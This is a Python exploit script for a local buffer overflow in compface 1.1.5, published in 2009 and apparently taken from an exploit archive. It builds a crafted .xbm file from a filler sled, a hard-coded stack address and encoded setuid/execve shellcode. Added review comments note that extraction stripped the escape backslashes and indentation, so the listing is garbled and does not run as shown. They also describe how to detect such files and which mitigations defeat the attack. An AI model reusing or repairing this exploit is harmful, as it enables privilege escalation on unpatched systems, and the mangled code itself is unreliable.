# Title : Compface 1.1.5 (.xbm File) Local Buffer Overflow Exploit
# Published : 2009-07-30
# Author : His0k4
#!/usr/bin/python
#[*] Exploit : Compface '.xbm' Local Buffer Overflow Exploit
#[*] Affected : compface 1.1.5
#[*] Tested on : Ubuntu 9.04 (without stack randomization, i.e. with ASLR disabled)
#[*] Refer : bid/35863
#[*] Exploit : His0k4
#[*] Use : $compface exploit.xbm out
#setuid/execve shellcode for Linux/x86 by Marco Ivaldi
#[*] x86/alpha_mixed succeeded with size 124 (iteration=1)
# Encoded payload blob appended to the crafted file body further down.
# The header comments above describe it as a setuid/execve Linux/x86
# shellcode run through the x86/alpha_mixed encoder (reported size 124).
# NOTE(review): the escape backslashes appear to have been stripped when this
# page was extracted. As written, each literal is plain ASCII text (the
# letter "x" followed by two hex digits), not raw bytes, so this listing is
# not a faithful copy of the author's original. The number of xNN tokens
# looks consistent with the 124 reported by the encoder line.
# Adjacent string literals inside the parentheses are concatenated by Python
# into a single str.
shellcode=(
"x89xe1xdbxd1xd9x71xf4x5ex56x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x42x4ax42x37x50x58x50x31x49x4bx48x4dx4dx50x42"
"x4ax44x4bx50x58x4dx49x51x42x42x48x46x4fx46x4f"
"x44x33x45x38x42x48x46x4fx42x42x42x49x42x4ex4b"
"x39x4dx33x51x42x50x53x4cx49x4bx51x48x4dx4dx50"
"x45x5ax41x41")
# Assemble the text of the crafted .xbm file as one string.
# Layout, in order: two "#define noname_*" lines that imitate an XBM header,
# the keyword "static", then one long unbroken run (filler, a 4-byte value,
# more filler, the shellcode blob) and finally "char = {".
# NOTE(review): the trailing "rn" on several lines is presumably a CR/LF pair
# whose backslashes were lost in extraction, and the "x90"/"x80..." literals
# likewise; as written they are literal letters and digits.
# Defensive reading: a legitimate XBM has a short declaration after "static";
# a line hundreds of bytes long at that position, made of non-text data, is
# the anomaly to look for. The vulnerable parsing code is not shown on this
# page, so which buffer overflows is not established here.
payload = "#define noname_width 48rn"
payload += "#define noname_height 48rn"
payload += "staticrn"
# 180 filler tokens placed ahead of the overwritten value.
payload += "x90"*180
# Hard-coded 4-byte value, annotated by the author as a stack location.
# A fixed stack address is only predictable when stack randomization is off,
# which matches the "Tested on" line in the header; ASLR, a non-executable
# stack and stack-protector builds are the mitigations that break this
# assumption.
payload += "x80xf4xffxbf" #$esp+10h
# 16 further filler tokens between that value and the blob.
payload += "x90"*16
payload += shellcode
payload += "rn"
payload += "char = {rn"
# Write the assembled string to "exploit.xbm" in the current directory; the
# usage line in the header passes that file to compface as its input.
# NOTE(review): indentation was lost in extraction. The four statements after
# "try:" and the one after "except:" were presumably indented, so the script
# does not parse as shown.
# NOTE(review): the file is opened in text mode ("w") and closed by hand, so
# the handle is not closed if write() raises.
try:
out_file = open("exploit.xbm","w")
out_file.write(payload)
out_file.close()
print("nExploit file created!n")
# Bare except: every failure, of any kind, is reduced to the single word
# "Error" with no detail. The Python 2 print statement below is mixed with the
# call form used above.
except:
print "Error"